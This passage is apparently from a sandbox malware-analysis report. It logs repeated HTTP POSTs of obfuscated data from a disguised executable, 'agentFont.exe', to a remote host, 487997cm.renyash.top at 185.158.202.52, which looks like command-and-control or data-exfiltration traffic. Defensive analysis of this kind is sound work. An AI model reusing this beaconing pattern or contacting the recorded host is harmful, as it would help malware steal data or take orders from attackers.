                                                                                  Data Raw: 02 1a 27 12 29 25 23 5c 30 05 0f 53 24 58 33 50 2b 23 25 02 2c 2c 22 04 31 3a 38 58 3c 0d 0a 0c 3f 2b 36 17 3c 03 2c 59 31 0c 3c 12 25 25 2a 51 00 1c 23 5b 2b 3b 30 07 3c 38 0b 0f 3d 0f 28 05 3c 2c 23 12 23 3a 33 12 24 28 3d 0f 27 2d 28 03 2b 59 3f 0e 2c 1c 3b 5f 38 33 3f 12 27 1c 2f 52 09 14 22 02 3d 1d 05 1d 26 0c 07 07 33 23 34 05 20 28 09 57 37 0b 22 09 37 1d 27 1f 28 2d 33 58 22 0f 07 01 26 02 26 44 2b 3e 27 57 23 3e 23 54 2c 03 23 56 0f 36 5d 51
                                                                                  Data Ascii: ')%#\0S$X3P+#%,,"1:8X<?+6<,Y1<%%*Q#[+;0<8=(<,##:3$(='-(+Y?,;_83?'/R"=&3#4 (W7"7'(-3X"&&D+>'W#>#T,#V6]Q


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  1192.168.2.449738185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:27:19.040397882 CET302OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Jan 1, 2025 11:27:19.393244982 CET1044OUTData Raw: 51 55 58 5b 54 41 55 5b 59 5f 5b 52 5a 5e 59 54 55 54 54 59 51 5f 5b 5b 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: QUX[TAU[Y_[RZ^YTUTTYQ_[[^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW-(#'2>971?"Y%<6^6%&3?)73\#.9_<:&X"#\.8
                                                                                  Jan 1, 2025 11:27:19.681232929 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:27:19.810910940 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:27:16 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  2192.168.2.449739185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:27:19.993756056 CET302OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Jan 1, 2025 11:27:20.347240925 CET1044OUTData Raw: 54 5a 58 5f 54 46 55 5d 59 5f 5b 52 5a 5d 59 52 55 5e 54 50 51 5a 5b 5b 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: TZX_TFU]Y_[RZ]YRU^TPQZ[[^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW.[)!!S 1-B.=+U%]3&^!&1P3)R>4,!%X)*&X"#\.
                                                                                  Jan 1, 2025 11:27:20.634182930 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:27:20.766663074 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:27:17 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  3192.168.2.449740185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:27:20.909374952 CET326OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:27:21.268426895 CET1044OUTData Raw: 54 54 5d 5e 51 47 50 5e 59 5f 5b 52 5a 5c 59 51 55 50 54 5a 51 50 5b 5a 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: TT]^QGP^Y_[RZ\YQUPTZQP[Z^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW-<"%"-<2:[,&0<)!&-V0,1R+78#>%(:&X"#\.0
                                                                                  Jan 1, 2025 11:27:21.554799080 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:27:21.698190928 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:27:18 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  4192.168.2.449741185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:27:21.821182966 CET326OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:27:22.174674034 CET1044OUTData Raw: 54 5b 5d 5d 54 44 50 59 59 5f 5b 52 5a 5c 59 53 55 57 54 5b 51 5f 5b 5f 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: T[]]TDPYY_[RZ\YSUWT[Q_[_^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW-)""-(Y1-9.$1/0/5"5%'=B3!9X+&X"#\.0
                                                                                  Jan 1, 2025 11:27:22.477868080 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:27:22.610064030 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:27:19 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  5192.168.2.449742185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:27:22.742516041 CET326OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:27:23.166023970 CET1044OUTData Raw: 54 56 5d 59 51 44 50 5e 59 5f 5b 52 5a 59 59 53 55 57 54 51 51 5e 5b 50 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: TV]YQDP^Y_[RZYYSUWTQQ^[P^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW.?=U4&.5:&X0<[6V%?1S=B,5*(&X"#\.$
                                                                                  Jan 1, 2025 11:27:23.383116961 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:27:23.514810085 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:27:19 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  6192.168.2.449743185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:27:23.652899027 CET326OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:27:24.002677917 CET1044OUTData Raw: 54 53 58 5f 51 44 55 5a 59 5f 5b 52 5a 58 59 5c 55 57 54 58 51 58 5b 5e 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: TSX_QDUZY_[RZXY\UWTXQX[^^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW.(5# &"B9=+W1>^',-6-V%,5Q=$"(*&X"#\.
                                                                                  Jan 1, 2025 11:27:24.298578024 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:27:24.428020000 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:27:20 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  7192.168.2.449744185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:27:24.556586981 CET326OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:27:24.909034014 CET1044OUTData Raw: 51 52 58 5e 51 40 55 5b 59 5f 5b 52 5a 58 59 5d 55 57 54 58 51 58 5b 51 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: QRX^Q@U[Y_[RZXY]UWTXQX[Q^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW.<2R#=<25-V1?_$*Z5C.0/=+'$".=Y+*&X"#\.
                                                                                  Jan 1, 2025 11:27:25.214513063 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:27:25.350153923 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:27:21 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  8192.168.2.449745185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:27:24.649671078 CET326OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1340
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:27:25.002738953 CET1340OUTData Raw: 51 57 5d 59 51 40 55 5f 59 5f 5b 52 5a 52 59 56 55 56 54 58 51 51 5b 58 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: QW]YQ@U_Y_[RZRYVUVTXQQ[X^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW.()772=D-=71?"\3Z&66%'?!V) 5>&?:&X"#\.
                                                                                  Jan 1, 2025 11:27:25.286804914 CET25INHTTP/1.1 100 Continue


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  9192.168.2.449746185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:27:25.534331083 CET302OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Jan 1, 2025 11:27:25.893359900 CET1044OUTData Raw: 51 55 5d 5b 54 47 55 5a 59 5f 5b 52 5a 59 59 55 55 5f 54 5a 51 5a 5b 50 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: QU][TGUZY_[RZYYUU_TZQZ[P^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW.](. Y%.*B.U2:^3[!=P$<!>4$"=\):&X"#\.$
                                                                                  Jan 1, 2025 11:27:26.191607952 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:27:26.358649969 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:27:22 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  10192.168.2.449747185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:27:26.537879944 CET326OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:27:26.893358946 CET1044OUTData Raw: 51 51 58 5b 54 4b 55 5b 59 5f 5b 52 5a 59 59 54 55 56 54 5f 51 51 5b 5c 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: QQX[TKU[Y_[RZYYTUVT_QQ[\^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW.+T!V4=([%-.(1<"X$,*^"5'?!W=';![=]<:&X"#\.$
                                                                                  Jan 1, 2025 11:27:27.174480915 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:27:27.302210093 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:27:23 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  11192.168.2.449748185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:27:27.429351091 CET302OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Jan 1, 2025 11:27:27.784048080 CET1044OUTData Raw: 51 57 5d 53 51 47 55 5e 59 5f 5b 52 5a 59 59 56 55 57 54 50 51 5c 5b 5c 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: QW]SQGU^Y_[RZYYVUWTPQ\[\^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW.]+:#=2>&--31?0<.X!C1Q32=B'Z6>)*&X"#\.$
                                                                                  Jan 1, 2025 11:27:28.075491905 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:27:28.207880974 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:27:24 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  12192.168.2.449749185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:27:28.338521957 CET326OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:27:28.690270901 CET1044OUTData Raw: 54 53 58 5b 54 44 50 5d 59 5f 5b 52 5a 5d 59 5d 55 57 54 5b 51 5e 5b 5b 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: TSX[TDP]Y_[RZ]Y]UWT[Q^[[^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW-?T9W $2%.[012X0:[!6%U0/=Q)\5:)*&X"#\.
                                                                                  Jan 1, 2025 11:27:28.975112915 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:27:29.102004051 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:27:25 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  13192.168.2.449750185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:27:29.230258942 CET326OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:27:29.581619978 CET1044OUTData Raw: 51 50 5d 5c 54 47 55 51 59 5f 5b 52 5a 5c 59 57 55 51 54 5f 51 5a 5b 51 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: QP]\TGUQY_[RZ\YWUQT_QZ[Q^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW-<2#>7%&A:[$1>3Z:X"C>0<!W>'06)<*&X"#\.0
                                                                                  Jan 1, 2025 11:27:29.885561943 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:27:30.017926931 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:27:26 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  14192.168.2.449751185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:27:30.157157898 CET326OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  15192.168.2.449752185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:27:30.383919001 CET326OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1324
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
